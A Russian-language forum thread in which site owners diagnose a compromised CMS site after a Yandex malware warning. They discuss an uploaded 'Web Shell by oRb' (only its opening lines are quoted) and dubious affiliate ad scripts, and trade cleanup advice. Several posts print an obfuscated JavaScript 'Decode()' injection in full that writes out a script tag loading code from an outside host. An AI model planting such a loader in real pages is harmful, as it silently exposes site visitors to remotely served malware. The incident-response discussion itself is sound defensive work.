Web Shell by oRb

[ower_xz 117]

Пришло от yandex письмо, что на сайте вредоносный код... Сам сколько ни лазил по сайту, касперский ничего не показал. Потом запустил автопроверку и нашел два "подарочка" - 1276961698_fr199.php и 1237943695_4.php. Код абсолютно одинаковый в обоих файлах.

<?php # Web Shell by oRb

$auth_pass = "";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e", и так далее...

Оба файла были в подпапках uploads с той лишь разницей, что один был в папке files, а другой в папке уменьшенных копий картинок за март 2009 года.

Кому интересна инфа об этом шелле, можете почитать тут: http://forum.xaknet.ru/thread12254.html

Пароли на всякий случай поменял, да и заплатки все стояли, но как-то все-таки залили...

[celsoft 6 076]

Речь случаем не о сайте edengard идет? Если да, то я кажется знаю причину, т.к. недавно решал такой же вопрос с другим сайтом. Во первых вирусы идут с рекламы а не с шелов, бот яндекса видит страницу а не содержания вашего сайта. Во вторых у вас у обоих одна и та же реклама и стоит одна и та же сомнительная PHP партнерка где предлагается скачать на высокой скорости непонятно что. Я видел код этой партнерки, в админпанели нет проверок доступа, разрешен свободный запуск с записью. Сами файлы которые скачиваются в этих партнерках блокируются антивирусами. В ваших шаблонах также множество сторонних JS файлов, например:

<script LANGUAGE="JavaScript"> 

<!--

function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

//-->

</SCRIPT><script LANGUAGE="JavaScript"> 

<!--

Decode();

//-->

</SCRIPT>[/code]

и т.д.


Удалите все эти партнерки с сайта полностью, восстановите оригинальные файлы скрипта, также из шаблонов уберите весь лишний JS код, после этого еще раз смените пароли. Также теперь проверяйте чтобы небыло в настройках разрешения на загрузку PHP, и в настройках групп нет такого разрешения

[ower_xz 117]

Да, этот сайт... Партнёрку эту я снял. А вот по поводу скрипта - я его не нашел. Шаблон пересмотрел полностью, но такого скрипта там нет. Я уже подумал, что прописался где-то после последних событий. Да и изначально в файлах используемого шаблона никаких скриптов не было. В коде страниц самого сайта я его тоже не вижу. Страницу не подскажете, где вы нашли этот код?

[celsoft 6 076]

ower_xz,

прямо на главной я его вижу. в самом начале страницы

[llbarmenll 18]

<script LANGUAGE="JavaScript">

<!--

function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

//-->

</SCRIPT><script LANGUAGE="JavaScript">

<!--

Decode();

//-->

</SCRIPT>

Скорее всего в index.php запихали.

[ower_xz 117]

Да, точно... Я через Firefox не видел, пока кэш не очистил. Только в Opera и IE видно было. Пришлось файлы перезалить, в самом шаблоне кода никакого не было.

[hrompic 4]

Народ! Та же проблема-были всованы файлы users.php в папках editor,modules и аякс .Так же в папке files файл 1276748747_login.php .

Но Яндекс все равно орет что код вредоносный есть! друзья-гляньте сайт Ru-video.net ,уже всю рекламу снял и все равно вирус где то сидит!!! Буду очень признателен!!! :unsure:

[celsoft 6 076]

hrompic,

нет у вас ничего на сайте. Запросите информацию с яндекса на что он ругается.

[hrompic 4]

Запросил,но они только через неделю ответят как обычно....

Скажите а вот эти файлы оригинальные?

/engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php

А то в лицензионном архиве их нет а на сервере откуда то лежат,и причем стоян не ваши копирайты а :

Categories Menu version 2.0 Beta

-----------------------------------------------------

http://www.ikeep.ws/

-----------------------------------------------------

Copyright © 2009, 2010 Chrono

=====================================================

Данный код защищен авторскими правами

=====================================================

Файл: cat_menu.php

-----------------------------------------------------

Назначение: Вывод меню категорий

[celsoft 6 076]

Скажите а вот эти файлы оригинальные?

/engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php

нет, это сторонний модуль

[hrompic 4]

Скажите а вот эти файлы оригинальные?

/engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php

нет, это сторонний модуль

А вот этот ? Его в стандартном дистрибутиве нету хотя стоят ваши копирайты:

engine/modules/c_navigation.php

[celsoft 6 076]

А вот этот ? Его в стандартном дистрибутиве нету хотя стоят ваши копирайты:

engine/modules/c_navigation.php

это осталось от старой версии скрипта, в новых версиях его можно удалить

[hrompic 4]

Речь случаем не о сайте edengard идет? Если да, то я кажется знаю причину, т.к. недавно решал такой же вопрос с другим сайтом. Во первых вирусы идут с рекламы а не с шелов, бот яндекса видит страницу а не содержания вашего сайта. Во вторых у вас у обоих одна и та же реклама и стоит одна и та же сомнительная PHP партнерка где предлагается скачать на высокой скорости непонятно что. Я видел код этой партнерки, в админпанели нет проверок доступа, разрешен свободный запуск с записью. Сами файлы которые скачиваются в этих партнерках блокируются антивирусами. В ваших шаблонах также множество сторонних JS файлов, например:

<script LANGUAGE="JavaScript"> 

<!--

function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

//-->

</SCRIPT><script LANGUAGE="JavaScript"> 

<!--

Decode();

//-->

</SCRIPT>

и т.д.

Удалите все эти партнерки с сайта полностью, восстановите оригинальные файлы скрипта, также из шаблонов уберите весь лишний JS код, после этого еще раз смените пароли. Также теперь проверяйте чтобы небыло в настройках разрешения на загрузку PHP, и в настройках групп нет такого разрешения

А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ...

[ower_xz 117]

А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ...

bitcash.ru

[hrompic 4]

А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ...

bitcash.ru

Вы думаете что это от них?

Как лучше защитить свои сайты от заливки чужих файлов?

[celsoft 6 076]

Вы думаете что это от них?

что у вас тоже эта реклама стояла?

Как лучше защитить свои сайты от заливки чужих файлов?

удалить все сторонние файлы с сервера, установить оригинальные файлы скрипта, убедится что стоят все вышедшие патчи безопасности

[hrompic 4]

1.Да,тоже их реклама была,но я не верю что это они виноваты.

2.Так у меня все патчи стояли и обновлялся постоянно и вот все равно напакостили.Кстати заменил все файлы сайта на оригинальные и Яндекс наконец соизволил убрать пометку зараженности сайта!

[celsoft 6 076]

1.Да,тоже их реклама была,но я не верю что это они виноваты.

я кстати не говорю, что они напрямую виноваты. В их коде я лишь увидел отсутствие проверки доступа, точнее проверка есть, но проводится не корректно и любой может получить доступ к администрованию и записи. Это могут знать и злоумышленники и пользоваться.

[ower_xz 117]

Вы думаете что это от них?

Больше вариантов лично я не вижу и склонен согласиться с celsoft. Эти партнерки довольно "мутные" и админы не особо заботятся о безопасности своих кодов. А многие просто находят где-то в сети файлы этих скриптов и готово - вот тебе партнерка. Сами сайты, используемые для скачивания файлов, очень часто оказываются зараженными (в том числе и скачиваемые файлы, что не есть хорошо для пользователей) и если другие антивирусы часто помалкивают, то касперский отслеживает их на раз. Других сторонних кодов у меня лично не было.

[prikindel 255]

некоторые партнерки, в частности речь идет об adskape.ru, позволяют рекламировать у себя загрузки и псевдо антивирусы.

так что рассчитывать их на честность и порядочность не стоит, им лишь бы бабло с рекламодателей снять, а то что рекламируется палево им не важно.